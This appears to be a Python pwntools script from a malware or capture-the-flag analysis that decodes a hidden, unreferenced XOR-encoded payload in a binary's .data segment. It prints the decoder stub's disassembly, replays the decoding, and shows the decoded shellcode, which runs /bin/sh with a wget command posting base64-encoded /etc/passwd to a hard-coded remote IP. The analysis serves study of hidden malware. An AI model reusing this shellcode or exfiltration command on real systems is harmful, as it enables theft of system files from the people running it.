|
import struct

from pwn import * # https://pwntools.com to install
|
|
|
# Target binary under analysis; its .data segment carries the unreferenced
# decoder stub and the encoded payload walked by the loop below.
binary_path = 'notes_19cd983d58eef2e5c7881ae8407e76d6'
e = ELF(binary_path)
|
|
|
### Decoder stub found in .data; nothing in the binary references it
|
""" |
|
.data:0804C0A0 ; --------------------------------------------------------------------------- |
|
.data:0804C0A0 mov eax, 2 |
|
.data:0804C0A5 int 80h ; LINUX - sys_fork |
|
.data:0804C0A7 test eax, eax |
|
.data:0804C0A9 jz short loc_804C0B2 |
|
.data:0804C0AB mov eax, 41414141h |
|
.data:0804C0B0 jmp eax |
|
.data:0804C0B2 ; --------------------------------------------------------------------------- |
|
.data:0804C0B2 |
|
.data:0804C0B2 loc_804C0B2: ; CODE XREF: .data:0804C0A9j |
|
.data:0804C0B2 cld |
|
.data:0804C0B3 mov ebx, 5363FD0h ; xor key |
|
.data:0804C0B8 jmp short call_decode_loop |
|
.data:0804C0BA |
|
.data:0804C0BA ; =============== S U B R O U T I N E ======================================= |
|
.data:0804C0BA |
|
.data:0804C0BA |
|
.data:0804C0BA decode_loop proc near ; CODE XREF: .data:call_decode_loopp |
|
.data:0804C0BA pop esi |
|
.data:0804C0BB push esi |
|
.data:0804C0BC |
|
.data:0804C0BC loop: ; CODE XREF: decode_loop+9j |
|
.data:0804C0BC xor [esi], ebx |
|
.data:0804C0BE lodsd |
|
.data:0804C0BF add ebx, eax |
|
.data:0804C0C1 test eax, eax |
|
.data:0804C0C3 jnz short loop |
|
.data:0804C0C5 retn |
|
.data:0804C0C5 decode_loop endp |
|
.data:0804C0C5 |
|
.data:0804C0C6 ; --------------------------------------------------------------------------- |
|
.data:0804C0C6 |
|
.data:0804C0C6 call_decode_loop: ; CODE XREF: .data:0804C0B8j |
|
.data:0804C0C6 call decode_loop |
|
.data:0804C0C6 ; --------------------------------------------------------------------------- |
|
.data:0804C0CB dd 9C6E34BAh |
|
""" |
|
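decoder = 0x0804C0A0  # fork + decode stub (see listing above); unreferenced in the binary
encoded = 0x0804C0CB  # first encoded dword, the return address pushed by `call decode_loop`
ebx = 0x5363FD0       # initial XOR key loaded into ebx at 0804C0B3

# The stub's loop is `xor [esi], ebx ; lodsd ; add ebx, eax ; test eax, eax ;
# jnz loop`: each dword is XORed with the running key, then the *decoded*
# value is folded into the key for the next dword, and a decoded zero dword
# ends the loop. The width and byte order are fixed by `lodsd`, so pin them
# here instead of relying on pwntools' global `context`.
_DWORD = struct.Struct('<I')


def _decode_rolling_xor(read, start, key, max_dwords=4096):
    """Replay the binary's self-decoding loop over the encoded blob.

    Args:
        read: callable ``read(address, size) -> bytes``, e.g. ``ELF.read``.
        start: virtual address of the first encoded dword.
        key: initial 32-bit XOR key (the value the stub loads into ebx).
        max_dwords: upper bound on dwords to decode. The original loop runs
            until it sees a decoded zero; bounding it here keeps a missing
            terminator from walking off the mapped segment.

    Returns:
        The decoded dwords as a list of ints, including the terminating zero.

    Raises:
        ValueError: if a read comes back short or no terminator is found
            within ``max_dwords``.
    """
    decoded = []
    address = start
    for _ in range(max_dwords):
        chunk = read(address, 4)
        if len(chunk) != 4:
            raise ValueError('short read of %d byte(s) at 0x%x' % (len(chunk), address))
        (dword,) = _DWORD.unpack(chunk)
        dword ^= key
        decoded.append(dword)
        if dword == 0:
            return decoded
        key = (key + dword) & 0xffffffff  # `add ebx, eax` on a 32-bit register
        address += 4
    raise ValueError('no zero terminator within %d dwords from 0x%x' % (max_dwords, start))


data = _decode_rolling_xor(e.read, encoded, ebx)

# b''.join works on both Python 2 (str is bytes) and Python 3, where the
# packed values are bytes and ''.join would raise TypeError.
payload = b''.join(_DWORD.pack(dword) for dword in data)

# Dump for inspection and save the decoded blob for offline disassembly.
print(hexdump(payload))
write('payload', payload)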
|
|
|
### Disassembly of the dumped payload (roughly): an execve of /bin/sh -c running the wget command below, which posts /etc/passwd to a remote host
|
""" |
|
seg000:00000000 seg000 segment byte public 'CODE' use32 |
|
seg000:00000000 assume cs:seg000 |
|
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing |
|
seg000:00000000 push 0Bh ; sys_execve |
|
seg000:00000002 pop eax |
|
seg000:00000003 cdq |
|
seg000:00000004 push edx |
|
seg000:00000005 push small 632Dh |
|
seg000:00000009 mov edi, esp |
|
seg000:0000000B push 'hs/' |
|
seg000:00000010 push 'nib/' |
|
seg000:00000015 mov ebx, esp |
|
seg000:00000017 push edx |
|
seg000:00000018 call loc_C4 |
|
seg000:00000018 ; --------------------------------------------------------------------------- |
|
seg000:0000001D aWgetHttp54_178 db 'wget http://54.178.137.178/9isnxkqmz.php --post-data "`cat /etc/p' |
|
seg000:0000001D db 'asswd | base64 | tr -d "\n"`" --header="Content-Type: text/plain"' |
|
seg000:0000001D db ' -O /dev/null >/dev/null 2>/dev/null',0 |
|
seg000:000000C4 ; --------------------------------------------------------------------------- |
|
seg000:000000C4 |
|
seg000:000000C4 loc_C4: ; CODE XREF: seg000:00000018p |
|
seg000:000000C4 push edi |
|
seg000:000000C5 push ebx |
|
seg000:000000C6 mov ecx, esp |
|
seg000:000000C8 int 80h ; LINUX - sys_execve (eax = 0Bh, pushed at seg000:00000000)
|
seg000:000000C8 ; --------------------------------------------------------------------------- |
|
""" |